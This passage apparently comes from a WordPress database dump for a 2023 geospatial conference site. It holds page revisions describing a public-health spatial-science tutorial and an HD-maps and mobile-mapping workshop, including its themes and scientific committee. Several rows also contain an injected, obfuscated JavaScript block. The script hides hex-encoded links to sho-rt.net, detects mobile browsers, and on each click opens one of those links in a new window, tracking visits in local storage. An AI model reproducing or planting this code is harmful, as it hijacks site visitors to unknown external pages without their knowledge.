_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','inherit','closed','closed','','3681-revision-v1','','','2023-02-05 10:52:55','2023-02-05 10:52:55','',3681,'https://gsw2023.com/?p=3803',0,'revision','',0),
(3804,1,'2023-02-05 10:54:01','2023-02-05 10:54:01','[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\"><strong>Public Health Data Handling, Analysis and Visualisation using Spatial Science</strong></h5>\r\n<h6></h6>\r\n<h6><strong>Tutorial Topic</strong></h6>\r\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</span></strong></p>\r\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 12pt;\">In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</span></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\">Short Profile &amp; Affiliation of Instructors</h4>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"70\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','inherit','closed','closed','','3681-revision-v1','','','2023-02-05 10:54:01','2023-02-05 10:54:01','',3681,'https://gsw2023.com/?p=3804',0,'revision','',0),
(3805,1,'2023-02-05 10:59:16','2023-02-05 10:59:16','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\" img_size=\"200x200\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>MMT and HDMaps - Mobile Mapping Technologies and HDMaps</strong></span></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"37\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: left; color: green;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Static HD maps automated production and update</strong></h6>\n</li>\n<li>\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\n</li>\n<li>\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\n</li>\n<li>\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\n</li>\n<li>\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\n</li>\n<li>\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\n</li>\n<li>\n<h6><strong>HD maps applications</strong></h6>\n</li>\n<li>\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\n</li>\n<li>\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\n</li>\n<li>\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-sensor calibration</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\n</li>\n<li>\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\n</li>\n<li>\n<h6><strong>Point cloud processing</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning for 3D spatial information processing</strong></h6>\n</li>\n<li>\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\n</li>\n<li>\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\n</li>\n<li>\n<h6><strong>Novel application cases</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]<strong><u style=\"text-align: left; color: green;\">Scientific Committee:</u></strong></p>\n<h6><strong>Kai-Wei Chiang, National Cheng Kung University, Taiwan</strong></h6>\n<ul>\n<li>\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Ling Pei, Shanghai Jiao Tong University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\n</li>\n<li>\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Gunther Retscher, University of Vienna, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Xiaoji Niu, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Vassilis Gikas, NTUA, Greece</strong></h6>\n</li>\n<li>\n<h6><strong>Marco Piras, Polytechnic of Turin, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Paolo Dabove, Polytechnic of Turin, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>You Li, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Adel Mohamed Aly Elsayed Moussa, Calgary University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Hsiu-Wen Chang Joly, PSL University, France</strong></h6>\n</li>\n<li>\n<h6><strong>Salil Goel, Uttar Pradesh, India</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 